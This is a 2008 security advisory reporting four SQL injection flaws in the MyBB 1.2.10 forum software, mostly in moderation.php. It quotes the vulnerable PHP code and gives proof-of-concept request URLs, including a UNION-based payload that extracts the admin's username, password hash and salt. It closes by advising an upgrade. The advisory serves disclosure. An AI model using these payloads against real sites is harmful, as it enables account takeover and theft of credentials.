|
=0D
[waraxe-2008-SA#062] - Multiple Sql Injections in MyBB 1.2.10=0D
================================================================================0D
=0D
Author: Janek Vind "waraxe"=0D
Date: 16. January 2008=0D
Location: Estonia, Tartu=0D
Web: http://www.waraxe.us/advisory-62.html=0D
=0D
=0D
Target software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
MyBB is a discussion board that has been around for a while; it has evolved=0D
from other bulletin boards into the forum package it is today. Therefore,=0D
it is a professional and efficient discussion board, developed by an active=0D
team of developers.=0D
=0D
Vulnerabilities discovered=0D
================================================================================0D
=0D
1. SQL Injection in "moderation.php" action "do_mergeposts"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Precondition: attacker must have moderator privileges in target MyBB=0D
installation, including "canmanagethreads".=0D
=0D
>From source code of "moderation.php" line ~438:=0D
=0D
-------------------------------------------------------------------------------=0D
// Lets merge those selected posts!=0D
case "do_mergeposts":=0D
if(is_moderator($fid, "canmanagethreads") != "yes")=0D
{=0D
error_no_permission();=0D
}=0D
$plugins->run_hooks("moderation_do_mergeposts");=0D
$mergepost = $mybb->input['mergepost'];=0D
if(count($mergepost) <= 1)=0D
{=0D
error($lang->error_nomergeposts);=0D
}=0D
=0D
foreach($mergepost as $pid => $yes)=0D
{=0D
$plist[] = $pid;=0D
}=0D
=0D
$moderation->merge_posts($plist, $tid, $mybb->input['sep']);=0D
-------------------------------------------------------------------------------=0D
=0D
As seen above, unsanitized array variable 'mergepost' from GPC is delivered to=0D
function "merge_posts()" as first argument - "$plist".=0D
=0D
Source code of "merge_posts":=0D
-------------------------------------------------------------------------------=0D
function merge_posts($pids, $tid, $sep="new_line")=0D
{=0D
global $db, $plugins;=0D
=0D
$pidin = implode(",", $pids);=0D
$first = 1;=0D
// Get the messages to be merged=0D
$query = $db->query("=0D
SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts=0D
FROM ".TABLE_PREFIX."posts p=0D
LEFT JOIN ".TABLE_PREFIX."forums f ON (f.fid=p.fid)=0D
WHERE p.tid='$tid' AND p.pid IN($pidin)=0D
ORDER BY dateline ASC=0D
");=0D
-------------------------------------------------------------------------------=0D
=0D
It is obvious, that "$pids" argument will be used in sql query without any =0D
sanitization. So sql injection security hole seems to exist here.=0D
=0D
Let's try this proof of concept test:=0D
=0D
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts=0D
&mergepost[war]=1&mergepost[axe]=2=0D
=0D
... and we can see sql error message:=0D
=0D
MySQL error: 1054=0D
Unknown column 'war' in 'where clause'=0D
Query: SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts=0D
FROM mybb_posts p LEFT JOIN mybb_forums f ON (f.fid=p.fid)=0D
WHERE p.tid='0' AND p.pid IN(war,axe) ORDER BY dateline ASC=0D
=0D
Yes, indeed, sql injection exists and as bonus, we can determine from error=0D
message additional piece of information, useful for sql injections -=0D
table prefix. It can be different from "mybb_" and without knowing it we will=0D
have trouble trying to fetch data from MyBB tables.=0D
=0D
This was Proof-Of-Concept test, how about real attack example?=0D
Here it is:=0D
=0D
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts=0D
&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,=0D
(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)=0D
+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2=0D
=0D
As result we can see sql error message:=0D
=0D
MySQL error: 1064=0D
You have an error in your SQL syntax; check the manual that corresponds to=0D
your MySQL server version for the right syntax to use near ... line 1=0D
Query: UPDATE mybb_users SET postnum=postnum-1=0D
WHERE uid='^waraxe^aff3fcfc70d2a50c3d4c2158233c3901^C5ybEW6b^''=0D
=0D
Yeah - admin's username, password hash and salt, all in one line!=0D
=0D
Now - mitigating factors. First of all, attacker must have moderator privileges,=0D
including "canmanagethreads". So this sql injection security hole can be=0D
used for privileges escalation from moderator to admin, if admin's password=0D
is weak enough to be cracked with reasonable processing power and time.=0D
=0D
Error feedback - if attacker can't see sql error messages, then this will not=0D
stop the attack, it will be just harder to exploit and involves blind sql=0D
injection attack methods.=0D
=0D
=0D
2. SQL Injection in "moderation.php" action "allreports"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Precondition: attacker must have moderator privileges in target MyBB=0D
installation.=0D
=0D
Let's try:=0D
=0D
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'=0D
+UNION+SELECT+waraxe--+=0D
=0D
And we see error message:=0D
=0D
MySQL error: 1054=0D
Unknown column 'waraxe' in 'field list'=0D
Query: SELECT COUNT(rid) AS count FROM mybb_reportedposts WHERE=0D
rid <= '0' UNION SELECT waraxe-- '=0D
=0D
Problematic code:=0D
=0D
case "allreports":=0D
if(is_moderator() != "yes")=0D
{=0D
error_no_permission();=0D
}=0D
...=0D
if($mybb->input['rid'])=0D
{=0D
$query = $db->simple_select(TABLE_PREFIX."reportedposts",=0D
"COUNT(rid) AS count", "rid <= '".$mybb->input['rid']."'");=0D
=0D
This sql injection can ultimately lead to privilege escalation from=0D
moderator level to admin level - as in previous case.=0D
=0D
=0D
3. SQL Injection in "moderation.php" action "do_multimovethreads"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Precondition: attacker must have moderator privileges in target MyBB=0D
installation, including "canmanagethreads".=0D
=0D
Let's issue this request:=0D
=0D
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads=0D
&moveto=2&threads=war|axe=0D
=0D
Error message:=0D
=0D
MySQL error: 1054=0D
Unknown column 'war' in 'where clause'=0D
Query: SELECT fid, visible, replies, unapprovedposts FROM mybb_threads=0D
WHERE tid IN (war,axe)=0D
=0D
Flawed piece of code:=0D
=0D
case "do_multimovethreads":=0D
if(is_moderator($fid, "canmanagethreads") != "yes")=0D
{=0D
error_no_permission();=0D
}=0D
$moveto = intval($mybb->input['moveto']);=0D
$threadlist = explode("|", $mybb->input['threads']);=0D
foreach($threadlist as $tid)=0D
{=0D
$tids[] = $tid;=0D
}=0D
...=0D
$moderation->move_threads($tids, $moveto);=0D
=0D
Similary to previous two cases, this sql injection can lead to privilege=0D
escalation from moderator level to admin level within MyBB context.=0D
=0D
=0D
4. SQL Injection in "admin/usergroups.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Precondition: attacker must have admin privileges in MyBB context, therefore=0D
risk level is low. Still, any non-superadmin can fetch any data from database,=0D
including password hashes for other admins.=0D
=0D
http://localhost/mybb.1.2.10/admin/usergroups.php?=0D
adminsid=f962d4e991671f3f930d7117a745147f=0D
&action=do_joinrequests=0D
&request[waraxe]=decline=0D
=0D
Error:=0D
=0D
MySQL error: 1054=0D
Unknown column 'waraxe' in 'where clause'=0D
Query: DELETE FROM mybb_joinrequests WHERE uid IN(waraxe) AND gid=''=0D
=0D
http://localhost/mybb.1.2.10/admin/usergroups.php?=0D
adminsid=f962d4e991671f3f930d7117a745147f=0D
&action=do_joinrequests=0D
&request[-1]=decline=0D
&gid='waraxe=0D
=0D
Error:=0D
=0D
MySQL error: 1064=0D
You have an error in your SQL syntax; check the manual that corresponds to=0D
your MySQL server version for the right syntax to use near 'waraxe'' at line 1=0D
Query: DELETE FROM mybb_joinrequests WHERE uid IN(-1) AND gid=''waraxe'=0D
=0D
Reason - incoming variables "request" and "gid" are not properly sanitized=0D
before using in sql queries.=0D
=0D
=0D
How to fix:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Download MyBB new version 1.2.11 as soon as possible!=0D
=0D
Greetings:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb=0D
and anyone else who know me!=0D
Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!=0D
=0D
Contact:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
come2waraxe@yahoo.com=0D
Janek Vind "waraxe"=0D
=0D
Homepage: http://www.janekvind.com/=0D
Waraxe forum: http://www.waraxe.us/forums.html=0D
=0D
---------------------------------- [ EOF ] --------------------------------=0D